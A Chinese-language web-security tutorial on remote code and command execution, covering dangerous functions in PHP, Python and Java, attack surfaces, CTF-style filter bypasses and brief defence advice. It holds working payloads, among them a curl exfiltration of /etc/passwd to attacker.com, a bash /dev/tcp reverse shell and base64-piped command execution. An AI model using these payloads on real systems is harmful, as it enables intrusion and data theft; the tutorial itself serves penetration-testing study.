web安全-RCE(代码执行与命令执行)
RCE1. 核心概念区分代码执行应用程序将用户输入当作代码如PHP、Python脚本解析执行。攻击者可以注入恶意代码执行任意脚本功能。命令执行应用程序调用操作系统命令如system()、exec()用户输入被拼接到命令中。攻击者可以注入恶意命令直接控制服务器操作系统。2. 漏洞函数与危险函数清单白盒审计关键点PHP代码执行eval()、assert()、preg_replace()/e修饰符已废弃但旧代码仍有、create_function()、array_map()、call_user_func()/call_user_func_array()配合动态函数名、array_filter()、uasort()、unserialize()反序列化可能触发。命令执行system()、exec()、shell_exec()、pcntl_exec()、popen()、proc_open()、passthru()、反引号。Python代码执行eval()、exec()、execfile()Python2、compile()、__import__。命令执行os.system()、os.popen()、subprocess模块call()、Popen()、run()、commands.getoutput()。Java代码执行无直接eval()函数但通过反射、表达式引擎如OGNL、SpEL、MVEL、模板引擎如Velocity、Freemarker、反序列化如Fastjson、Jackson等实现。命令执行Runtime.getRuntime().exec()、ProcessBuilder。3. 攻击面挖掘黑盒功能点渗透测试中重点关注以下功能点代码/脚本在线执行平台如在线PHP运行、Python运行、SQL在线工具等。直接尝试执行系统命令或读取文件。Payload:system(id);、echo file_get_contents(/etc/passwd);️系统管理面板如网络检测ping、traceroute、日志查看、服务启停等。这些功能常调用系统命令可能存在命令注入。参数注入127.0.0.1; cat /etc/passwd、| whoami评论/解析功能某些应用支持富文本或表达式解析如SpEL攻击者可能注入表达式。SpEL Payload:T(java.lang.Runtime).getRuntime().exec(calc)文件上传/包含上传包含恶意代码的文件如PHP一句话配合文件包含漏洞触发。第三方组件/中间件已知RCE漏洞如ThinkPHP RCE、Struts2 OGNL、Log4j2 JNDI注入等。使用漏洞扫描器或指纹识别后直接验证。其他漏洞引发SQL注入写文件、反序列化、XXE等可能最终导致RCE。4. 利用技巧与绕过手法有回显利用直接执行命令并获取输出。system(cat /etc/passwd); echo shell_exec(ls -la);无回显利用写文件将命令结果写入Web目录可访问的文件。system(cat /etc/passwd /var/www/html/1.txt);DNS/HTTP外带利用curl或wget将结果发送到攻击者服务器。system(curl http://attacker.com/?datacat /etc/passwd | base64);反弹Shell直接建立反向连接。bash -i /dev/tcp/attacker_ip/4444 01绕过技巧结合CTF案例空格绕过{cat,/etc/passwd}、cat${IFS}/etc/passwd、cat%09/etc/passwd关键字绕过通配符/???/c?t /???/p?ss??、cat /etc/pass???变量拼接ac;bat;$a$b /etc/passwd编码echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash命令分隔符;、|、||、、、\n%0a利用管道符和重定向# 30题示例 cp fla*.ph* 2.txt # 利用通配符和复制绕过过滤 echo shell_exec(tac fla*.ph*);参数逃逸31题利用动态参数注入额外代码。eval($_GET[1]); 1system(tac flag.php);包含与伪协议32~39题利用文件包含配合data://、php://input等伪协议执行代码。include$_GET[a]?adata://text/plain,?system(tac flag.php);? include$_GET[a]?aphp://filter/readconvert.base64-encode/resourceflag.php # 37~39 通过包含读取flag php://input post: ?php system(tac flag.php);?5. 漏洞引发链间接RCERCE常作为漏洞利用的最终目标由其他漏洞触发文件包含包含本地或远程文件若文件内容可控则执行恶意代码。文件上传上传WebShell直接获取代码执行权限。反序列化反序列化过程中自动调用魔术方法触发恶意代码。SQL注入若数据库支持写文件into outfile可写入WebShell。XXE若支持expect://协议或能结合SSRF攻击内部RCE服务。SSTI模板注入可直接执行代码。6. 实战注意事项语言环境识别根据返回头、文件后缀、参数特征判断后端语言选择合适的Payload。命令执行的跨平台性Windows与Linux命令差异大需分别测试。WAF绕过结合编码、混淆、特殊字符拆分进行测试。权限提升获得初始RCE后进一步进行内网渗透、提权。7. 防御与修复建议尽量避免使用动态执行函数如eval()、system()。严格过滤用户输入使用白名单验证。禁用危险函数disable_functions、限制执行权限。使用安全的API替代命令执行如PHP的proc_open需严格控制参数。保持组件和框架更新及时修补已知漏洞。总结RCE是渗透测试中的高危漏洞往往直接获取服务器权限。挖掘时需拓宽思路不仅关注显眼的在线执行功能还要注意系统命令调用点、表达式解析、组件漏洞等。利用时要灵活运用绕过技巧结合有回显/无回显方法获取数据。牢记各类危险函数和利用手法才能在实战中迅速抓住机会。如果你有特定场景或语言下的RCE问题欢迎进一步探讨

相关新闻

MC74HC165A在嵌入式系统中的GPIO扩展应用

MC74HC165A在嵌入式系统中的GPIO扩展应用

1. 项目背景与核心价值在嵌入式系统开发中,我们经常面临一个经典矛盾:功能需求日益复杂,但硬件资源(特别是IO引脚)却非常有限。传统方案中,每个按钮或传感器都需要独占一个GPIO引脚,当系统需要接…

2026/7/3 23:22:44阅读更多 →
第 43 篇:连接超时完全指南:从抓包到根因,拆解每一段沉默

第 43 篇:连接超时完全指南:从抓包到根因,拆解每一段沉默

抓包实战系列第 23 篇 | 阅读时间:12 分钟 | 关键词:超时、抓包、TCP、排障 📌 为什么读这篇 线上报警里,“timeout” 出现频率排前三。 但大多数超时排查是这样展开的: 1. 应用报错:timeout 2. 看一眼日志:没头绪 3. 群里问:网络是不是有问题? 4. 网络组:我们正…

2026/7/3 23:17:43阅读更多 →
Flux1-dev:让普通显卡也能运行专业级AI模型的终极解决方案

Flux1-dev:让普通显卡也能运行专业级AI模型的终极解决方案

Flux1-dev:让普通显卡也能运行专业级AI模型的终极解决方案 【免费下载链接】flux1-dev 项目地址: https://ai.gitcode.com/hf_mirrors/Comfy-Org/flux1-dev 还在为高端AI模型对显存的苛刻要求而烦恼吗?Flux1-dev专为24GB以下VRAM环境深度优化&am…

2026/7/3 23:17:43阅读更多 →
浅谈异常与恋爱

浅谈异常与恋爱

在java的异常结构中有一个顶级父类叫做Throwable,这个父类具有两个子类,分别是: Error Exception 为了便于初学者能更好的理解异常机制,我姑且先列举一些不恰当的例子: 可以这样理解Error 1.你某天很舒服的坐在沙发…

2026/7/4 0:37:51阅读更多 →
灾害响应中的多语言情感分析实战:零标注、低延迟、高可解释

灾害响应中的多语言情感分析实战:零标注、低延迟、高可解释

1. 项目概述:一场灾难中的情绪脉搏,为什么分析土耳其地震推文比单纯统计伤亡数字更关键2023年2月6日,土耳其南部与叙利亚边境发生7.8级强震,随后又遭遇多次余震,造成数万人遇难、百万级人口流离失所。当新闻画面里倒塌…

2026/7/4 0:37:51阅读更多 →
从AI代码风格到工程实践:Codex Taste如何重塑开发者的代码质量观

从AI代码风格到工程实践:Codex Taste如何重塑开发者的代码质量观

🚀 30款热门AI模型一站整合,DeepSeek/GLM/Claude 随心用,限时 5 折。 👉 点击领海量免费额度 如果你是一名开发者,最近是否感觉自己的代码“味道”有点不对?比如,代码越写越长,功…

2026/7/4 0:37:51阅读更多 →
CBCX平台:围绕合规意识与外汇行业合规表达的清单复盘

CBCX平台:围绕合规意识与外汇行业合规表达的清单复盘

对多数外汇相关用户来说,判断平台并不需要复杂术语,关键在于信息能否被快速理解、关键提示是否容易找到、服务体验是否稳定一致。以CBCX平台为例,这里聚焦这些更贴近实际使用的亮点与细节。在外汇相关服务中,读者最在意的通常是信…

2026/7/4 0:37:51阅读更多 →
为什么峰值是有效值的√2倍?

为什么峰值是有效值的√2倍?

“有效值”(RMS,均方根值)在电工学里的定义:让一个交流电在电阻上产生的发热功率,等于某个直流电产生的发热功率时,这个直流电压的数值。对于直流电,功率P Vrms/R,发热量正比于电压…

2026/7/4 0:37:51阅读更多 →
72小时神话破灭!Anthropic Fable 5两次越狱,暴露AI安全致命盲点

72小时神话破灭!Anthropic Fable 5两次越狱,暴露AI安全致命盲点

Fable 5两次越狱:72小时神话破灭6月9日,Anthropic发布Fable 5,并傲慢宣称经过1000小时外部压力测试,无通用越狱方法。然而,知名黑客「解放者普林尼」仅用三天,就让Fable 5吐出违禁化学品制作步骤和堆栈溢出…

2026/7/4 0:32:50阅读更多 →
AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

6个月前的2025年12月,Boris Cherny 公开宣布自己卸载了 IDE。一时间,Vibe Coding 成了全行业最热的话题。6个月后,当我们回过头来拉一份真实账本,发现事情远没有"一句话生成一个App"那么浪漫。本文从产品经理和研发两个…

2026/7/3 14:18:39阅读更多 →
审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

引言:审计结束三个月了,审计员的权限还没关某城商行每年按照监管要求开展至少一次数据安全审计。审计期间,内审部门需要抽样检查各类业务数据——交易流水、客户信息、员工操作日志、权限配置记录。这些数据分布在不同系统中,审计…

2026/7/3 14:38:35阅读更多 →
端到端自动驾驶:从GTC‘26看工程可信落地的核心逻辑

端到端自动驾驶:从GTC‘26看工程可信落地的核心逻辑

1. 项目概述:当算法工程师走进GTC26展厅,看到的不是芯片,而是“端到端”的呼吸节奏“端到端”这三个字,在GTC’26现场出现的频率,高得像NVLink带宽测试时的峰值曲线——它不再是一个论文里的技术路径选项,而…

2026/7/4 0:02:48阅读更多 →
缺牙修复科普:常见义齿类型与选择参考

缺牙修复科普:常见义齿类型与选择参考

缺牙修复科普:常见义齿类型与选择参考牙齿缺失是中老年人群中较为常见的口腔问题,不仅会造成咀嚼不便、进食受影响,长期还可能对营养摄入与日常社交带来困扰。义齿是改善缺牙问题的常用方式,目前市面上的义齿种类较多,…

2026/7/4 0:02:48阅读更多 →
STM32F091RC与LTC6904实现高精度方波信号生成

STM32F091RC与LTC6904实现高精度方波信号生成

1. 项目概述:LTC6904与STM32F091RC的精准方波生成方案在嵌入式系统开发中,精确的时钟信号和定时控制往往是项目成败的关键。LTC6904作为一款低功耗、高精度的可编程振荡器芯片,与STM32F091RC这款ARM Cortex-M0内核微控制器的组合,…

2026/7/4 0:02:48阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/3 1:12:46阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/3 1:36:36阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/3 2:08:15阅读更多 →